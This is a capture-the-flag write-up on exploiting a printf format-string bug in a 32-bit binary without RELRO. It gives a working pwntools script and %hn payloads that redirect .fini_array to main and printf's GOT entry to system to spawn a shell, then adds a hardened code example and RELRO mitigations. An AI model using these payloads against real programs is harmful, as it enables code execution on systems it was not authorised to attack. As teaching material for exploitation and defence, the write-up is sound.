Format string vulnerabilities - infinite loop

The program logic is essentially as follows. The binary contains a call to system, and the only protection enabled is NX.

#include <stdio.h>

char format[64];   /* buffer size is not shown in the original; 64 matches the %64s read */

int main(void)
{
    setvbuf(stdin, 0, 2, 0);    /* 2 == _IONBF: unbuffered */
    setvbuf(stdout, 0, 2, 0);
    puts("Welcome to my ctf! What's your name?");
    scanf("%64s", format);      /* appears as __isoc99_scanf in the decompilation */
    printf("Hello ");
    printf(format);             /* user input used directly as the format string */
    return 0;
}

A format string vulnerability exists, but it can be triggered only once: after the printf call the program returns and nothing else is executed.

There is, however, a way to make the program run in an infinite loop.

The program's execution flow is as follows:

[Figure: program execution flow]

When main returns, the .fini code calls, in turn, every function pointer stored in the .fini_array section.

[Figure: .fini_array contents]

If we overwrite that function pointer with the address of main, main is called again after it returns.

We can also overwrite the GOT entry of printf with the address of system, so that the printf call becomes a call to system.

Next we set a breakpoint at the printf call and look at the stack offset of our input.

[Figure: stack offset of the input at the printf breakpoint]

The input is at offset 4.

The final payload is:

payload=p32(fini_array)+p32(printf_got)+"%134513964c%4$n"+"%4294966940c%5$n"

However, printing that many characters takes too long and the interaction fails to receive the data, so the payload was switched to %hn writes of two bytes each:

payload="\x9c\x97\x04\x08\x9e\x97\x04\x08\x9c\x98\x04\x08\x9e\x98\x04\x08%34084c%4$hn%33488c%5$hn%31692c%6$hn%33844c%7$hn"
from pwn import *

context.log_level = 'debug'
p = process('./pwn')

fini_array = 0x0804979c   # first .fini_array entry, low half
fini_1     = 0x0804979e   # its high half
printf_got = 0x0804989c   # GOT entry of printf, low half
system_plt = 0x080483d0   # new value for printf's GOT entry
main_addr  = 0x08048534   # new value for the .fini_array entry

p.recvuntil(b"Welcome to my ctf! What's your name?\n")

# Four 2-byte writes via %hn. The 16 address bytes are already printed when
# the first %c padding starts, so the running character counts are:
#   16 + 34084 = 0x8534   -> low half of main_addr  into fini_array
#      + 33488 = 0x10804  -> 0x0804 (high half)     into fini_1
#      + 31692 = 0x183d0  -> low half of system_plt into printf_got
#      + 33844 = 0x20804  -> 0x0804 (high half)     into printf_got + 2
payload  = p32(fini_array) + p32(fini_1) + p32(printf_got) + p32(printf_got + 2)
payload += b"%34084c%4$hn%33488c%5$hn%31692c%6$hn%33844c%7$hn"
# Earlier single-shot version with two full %n writes (too slow to transfer):
# payload = p32(fini_array) + p32(printf_got) + b"%134513964c%4$n%4294966940c%5$n"

p.send(payload)
sleep(2)
p.recvuntil(b"Welcome to my ctf! What's your name?\n")   # main is running again
p.sendline(b"/bin/sh\x00")                                # printf now resolves to system
p.interactive()
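As an added example that is not part of the writeup or its binary, here is the vulnerable printf(&format) pattern next to its hardened form, plus a simple check that flags input containing format directives; the names greet_vulnerable, greet_fixed and contains_directive are this example's own.

```c
#include <stdio.h>
#include <string.h>
static char scratch[128];   /* shared output buffer for the demonstrations */

/* Vulnerable pattern from the writeup: the user's input *is* the format
 * string, so any directive in it is executed. With %hn / %n and attacker-
 * chosen addresses in the input this becomes the arbitrary write used
 * above. gcc/clang warn here with -Wformat-security; build with
 * -Werror=format-security to refuse such code. Only called in this file
 * with input that consumes no arguments, to stay within defined behaviour. */
static int greet_vulnerable(const char *name, char *out, size_t outlen)
{
    return snprintf(out, outlen, name);
}

/* Hardened form: the format is a constant and the name is plain data,
 * so "%4$hn" is copied literally instead of writing to memory. */
static int greet_fixed(const char *name, char *out, size_t outlen)
{
    return snprintf(out, outlen, "Hello %s", name);
}

/* Input check usable at the trust boundary or as a log-review heuristic:
 * returns 1 if the string holds a '%' that is not an escaped "%%". */
static int contains_directive(const char *s)
{
    for (; *s; s++) {
        if (*s != '%')
            continue;
        if (s[1] == '%') {   /* "%%" prints a literal percent sign */
            s++;
            continue;
        }
        return 1;
    }
    return 0;
}

int main(void)
{
    const char *benign  = "100%% sure";   /* constructed sample input */
    const char *hostile = "%4$hn";        /* directive shape from the writeup */
    greet_vulnerable(benign, scratch, sizeof scratch);
    printf("vulnerable, benign input: [%s]\n", scratch);   /* [100% sure] */
    greet_fixed(hostile, scratch, sizeof scratch);
    printf("fixed, hostile input:     [%s]\n", scratch);   /* [Hello %4$hn] */
    printf("hostile input flagged:    %d\n", contains_directive(hostile)); /* 1 */
    return 0;
}
```

Linking with -Wl,-z,relro makes .fini_array read-only and -Wl,-z,relro,-z,now additionally makes the GOT read-only, so either setting would have blocked the corresponding overwrite in a binary like this one, which had no RELRO at all.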


Origin www.cnblogs.com/playmak3r/p/12089284.html